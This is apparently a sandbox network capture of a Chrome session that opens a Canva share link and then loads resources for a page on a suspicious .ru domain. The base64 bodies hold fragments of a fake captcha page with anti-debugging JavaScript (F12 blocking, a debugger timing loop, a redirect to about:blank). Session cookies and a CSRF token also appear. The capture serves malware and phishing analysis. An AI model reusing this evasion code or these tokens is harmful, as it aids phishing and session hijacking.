                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1369INData Raw: 62 47 56 34 4c 57 52 70 63 6d 56 6a 64 47 6c 76 62 6a 6f 67 59 32 39 73 64 57 31 75 4f 77 30 4b 49 43 41 67 49 47 46 73 61 57 64 75 4c 57 6c 30 5a 57 31 7a 4f 69 42 6a 5a 57 35 30 5a 58 49 37 44 51 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 44 51 6f 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4d 54 42 77 65 44 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 56 75 64 43 42 70 62 57 63 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57 35 77 64 58 51
                                                                                                                                                                                                                                                    Data Ascii: bGV4LWRpcmVjdGlvbjogY29sdW1uOw0KICAgIGFsaWduLWl0ZW1zOiBjZW50ZXI7DQogICAgd2lkdGg6IDEwMCU7DQogICAgbWFyZ2luLXRvcDogMTBweDsNCn0NCg0KLmNhcHRjaGEtY29udGVudCBpbWcgew0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW5wdXQ
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1369INData Raw: 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67
                                                                                                                                                                                                                                                    Data Ascii: iA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAg
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1369INData Raw: 4e 76 62 6e 4e 30 49 45 78 44 65 6e 70 74 65 6d 39 50 52 30 4d 67 50 53 41 78 4d 44 41 37 44 51 6f 67 49 43 41 67 63 32 56 30 53 57 35 30 5a 58 4a 32 59 57 77 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 48 64 70 64 56 6c 78 64 6d 78 4d 52 30 38 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 48 64 6b 52 6c 46 30 56 46 42 36 56 47 77 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 48 64 6b 52 6c 46 30 56 46 42 36 56 47 77 67 4c
                                                                                                                                                                                                                                                    Data Ascii: NvbnN0IExDenptem9PR0MgPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IHdpdVlxdmxMR08gPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IHdkRlF0VFB6VGwgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKHdkRlF0VFB6VGwgL
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC794INData Raw: 7a 63 6d 4d 39 49 6d 52 68 64 47 45 36 61 57 31 68 5a 32 55 76 63 47 35 6e 4f 32 4a 68 63 32 55 32 4e 43 78 70 56 6b 4a 50 55 6e 63 77 53 30 64 6e 62 30 46 42 51 55 46 4f 55 31 56 6f 52 56 56 6e 51 55 46 42 57 55 46 42 51 55 46 48 51 55 4e 42 54 55 46 42 51 55 4e 55 52 31 56 58 54 6b 46 42 51 55 46 4a 52 30 35 4a 56 57 73 77 51 55 46 49 62 32 31 42 51 55 4e 42 61 45 46 42 51 53 74 6e 51 55 46 42 53 55 52 76 51 55 46 43 4d 55 31 42 51 55 45 32 62 55 46 42 51 55 52 78 57 55 46 42 51 56 68 6a 53 6e 6b 32 56 56 52 33 51 55 46 42 52 6e 68 56 52 58 68 56 55 6c 46 42 51 55 46 4d 4f 47 64 4a 55 43 73 76 51 55 31 4e 61 30 68 4e 56 57 6c 49 63 31 56 71 53 55 31 56 61 55 67 34 56 57 6c 49 4f 46 56 71 53 44 68 5a 61 6b 67 34 54 57 6c 49 64 6e 6b 34 51 53 39 78 4f 45
                                                                                                                                                                                                                                                    Data Ascii: zcmM9ImRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBWUFBQUFHQUNBTUFBQUNUR1VXTkFBQUFJR05JVWswQUFIb21BQUNBaEFBQStnQUFBSURvQUFCMU1BQUE2bUFBQURxWUFBQVhjSnk2VVR3QUFBRnhVRXhVUlFBQUFMOGdJUCsvQU1Na0hNVWlIc1VqSU1VaUg4VWlIOFVqSDhZakg4TWlIdnk4QS9xOE
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1369INData Raw: 66 37 64 0d 0a 31 4d 6d 4a 52 64 55 39 31 53 7a 56 45 61 7a 4a 78 55 31 52 54 62 31 55 77 63 43 38 31 4e 48 68 4f 5a 6d 46 54 65 6b 6f 77 52 33 42 55 64 69 38 76 4c 7a 46 4b 54 56 46 30 62 30 46 42 51 55 4a 77 5a 45 5a 4b 54 31 56 33 51 56 46 46 52 55 4a 32 62 6a 67 76 5a 6e 59 32 4b 30 46 56 52 79 74 6d 65 6a 6b 72 4c 31 46 50 4f 48 64 6d 4d 54 68 6e 57 48 6c 43 4c 32 34 72 4c 32 59 7a 4d 43 39 6d 56 44 51 72 55 45 6c 47 4c 33 5a 6a 52 79 39 32 5a 6a 49 35 5a 6b 31 4c 51 33 5a 5a 53 55 46 33 61 6e 68 44 55 44 4e 35 51 79 38 33 4d 30 4a 32 4e 7a 42 43 64 32 4e 4b 51 33 64 6a 54 79 39 32 59 30 4e 45 5a 6b 56 4b 51 31 46 46 54 79 39 6d 4d 7a 59 72 4c 32 74 4b 51 6d 64 59 65 45 46 6e 64 6a 67 72 51 57 34 30 52 46 42 4a 54 7a 6c 6e 57 55 34 76 55 47 39 43 52
                                                                                                                                                                                                                                                    Data Ascii: f7d1MmJRdU91SzVEazJxU1RTb1UwcC81NHhOZmFTekowR3BUdi8vLzFKTVF0b0FBQUJwZEZKT1V3QVFFRUJ2bjgvZnY2K0FVRytmejkrL1FPOHdmMThnWHlCL24rL2YzMC9mVDQrUElGL3ZjRy92ZjI5Zk1LQ3ZZSUF3anhDUDN5Qy83M0J2NzBCd2NKQ3djTy92Y0NEZkVKQ1FFTy9mMzYrL2tKQmdYeEFndjgrQW40RFBJTzlnWU4vUG9CR
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1369INData Raw: 33 4f 54 56 33 52 30 39 71 63 57 4a 4b 4d 45 6b 77 62 6b 5a 79 4f 54 49 7a 55 55 4e 49 4e 46 6f 72 52 48 5a 74 54 56 46 5a 53 6b 6c 4e 65 6d 5a 72 65 45 4e 43 52 43 74 46 64 6d 6c 31 55 6c 6c 42 53 6b 31 79 56 47 64 34 65 55 52 42 4f 54 52 4a 55 46 41 79 4d 46 4e 5a 52 32 39 4e 63 6d 5a 6e 65 45 4e 49 51 54 55 72 54 46 52 35 5a 43 39 45 4e 30 46 54 59 6b 59 77 53 6d 39 6d 5a 33 64 45 5a 6b 51 33 4e 54 6b 7a 61 58 4a 42 61 45 4a 71 59 54 68 48 54 56 45 30 53 48 4a 33 4f 46 56 6d 54 55 46 72 65 55 5a 76 55 6b 34 72 57 45 46 4a 62 7a 4d 76 4f 56 56 6e 52 57 74 33 64 45 31 58 55 46 46 5a 51 6b 51 7a 64 30 46 55 57 55 64 70 59 6d 35 33 62 30 52 73 54 54 64 52 59 56 67 32 63 55 52 47 51 54 42 52 65 6e 59 34 4d 55 4a 74 5a 31 6c 4a 57 6a 49 72 59 57 73 77 55 55
                                                                                                                                                                                                                                                    Data Ascii: 3OTV3R09qcWJKMEkwbkZyOTIzUUNINForRHZtTVFZSklNemZreENCRCtFdml1UllBSk1yVGd4eURBOTRJUFAyMFNZR29NcmZneENIQTUrTFR5ZC9EN0FTYkYwSm9mZ3dEZkQ3NTkzaXJBaEJqYThHTVE0SHJ3OFVmTUFreUZvUk4rWEFJbzMvOVVnRWt3dE1XUFFZQkQzd0FUWUdpYm53b0RsTTdRYVg2cURGQTBRenY4MUJtZ1lJWjIrYWswUU


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    106192.168.2.449866104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC3259OUTPOST /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 1624
                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-App: responsive_design_viewer
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    X-Canva-Build-Sha: e404dd6
                                                                                                                                                                                                                                                    X-Csrf-Token: Yzy1uD0I9GT_B9ypZbbQGK0r5qOlIcQ_PeqpudldO8IdMaoCmBoSvbrl3Hh6B9GL1gyOOuPINaA6kk4fV9uPuktO7bs
                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-Analytics: AAQAA1dFQgAA
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241217-21
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1624OUTData Raw: 7b 22 41 22 3a 5b 7b 22 41 3f 22 3a 22 44 22 2c 22 41 22 3a 7b 22 41 22 3a 22 30 34 34 33 63 38 64 64 2d 64 63 36 32 2d 34 64 31 62 2d 38 61 39 65 2d 39 37 64 30 30 31 33 62 64 64 34 37 22 2c 22 45 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 34 39 2e 35 33 39 5a 22 2c 22 46 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 35 32 2e 34 34 38 5a 22 2c 22 48 22 3a 22 65 6e 22 2c 22 49 22 3a 7b 22 41 22 3a 22 55 53 22 7d 2c 22 4a 22 3a 22 57 45 42 22 2c 22 4b 22 3a 7b 22 41 41 54 53 4f 22 3a 22 41 31 22 2c 22 57 4b 44 55 49 22 3a 22 41 22 2c 22 56 53 45 4d 4c 22 3a 22 43 22 2c 22 54 53 51 52 4c 22 3a 22 42 22 2c 22 54 4f 4d 4c 4f 22 3a 22 41 22 2c 22 53 45 4f 50 53 22 3a 22 43 22 2c 22 52 52 53 4e 43 22 3a 22 41 22 2c 22 52 52 53 43
                                                                                                                                                                                                                                                    Data Ascii: {"A":[{"A?":"D","A":{"A":"0443c8dd-dc62-4d1b-8a9e-97d0013bdd47","E":"2024-12-19T21:27:49.539Z","F":"2024-12-19T21:27:52.448Z","H":"en","I":{"A":"US"},"J":"WEB","K":{"AATSO":"A1","WKDUI":"A","VSEML":"C","TSQRL":"B","TOMLO":"A","SEOPS":"C","RRSNC":"A","RRSC
                                                                                                                                                                                                                                                    2024-12-19 21:27:55 UTC1061INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:54 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7ab73f97435c-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                    x-request-id: 8f4a7ab73f97435c
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GGzpVChviFs4g61hpO1DpTy4MycNhzzGxwx6Mt9cZiLERkzpwNxQZLtDOAYX3r6cwnjIJSOeXa6OpDtd3tZobjskUolN6GfcGycNp1gAwyQjh%2B8sj8%2FrWykz1rRuzeM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:55 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                    2024-12-19 21:27:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    107192.168.2.44986518.161.69.30443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC523OUTGET /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1610630260 HTTP/1.1
                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: UID=13Dfb7d508bf078883371d51734643670
                                                                                                                                                                                                                                                    2024-12-19 21:27:55 UTC363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:55 GMT
                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                    Via: 1.1 154746f00d2b5f8e2d55aa83bf3cce1a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: DXB52-P1
                                                                                                                                                                                                                                                    X-Amz-Cf-Id: Pz9hxv5bRdIfmRUfeDwoAlX-XcvqGGx85R3huntT-7NqSaLVrgEnGQ==
                                                                                                                                                                                                                                                    2024-12-19 21:27:55 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    108192.168.2.449867104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:56 UTC1977OUTGET /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:56 UTC1069INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:56 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7ac2aa53c434-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                    x-request-id: 8f4a7ac2aa53c434
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VdQy7dK9OHERkYeIuYcxkf5Sxwofb%2F09wBBuMXblGr7hh6WQvP6DTcJHhiGeFa9qrpzoNA7S30DXaBQBRkuHZc32M4kHls9rupv%2Fmfv7wUs5xd5hgXR9piDKSPDu3fg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:56 UTC64INData Raw: 33 61 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 6e 6f 74 20 66 6f 75 6e 64 22 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 3a'"])}while(1);</x>//{"statusCode":404,"error":"not found"}
                                                                                                                                                                                                                                                    2024-12-19 21:27:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    109192.168.2.449868151.101.194.137443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:56 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://58ts.vomlogsffy.ru/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:57 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Length: 89501
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:57 GMT
                                                                                                                                                                                                                                                    Age: 3165208
                                                                                                                                                                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740032-EWR
                                                                                                                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                                                                                                                    X-Cache-Hits: 2774, 12
                                                                                                                                                                                                                                                    X-Timer: S1734643677.058782,VS0,VE0
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
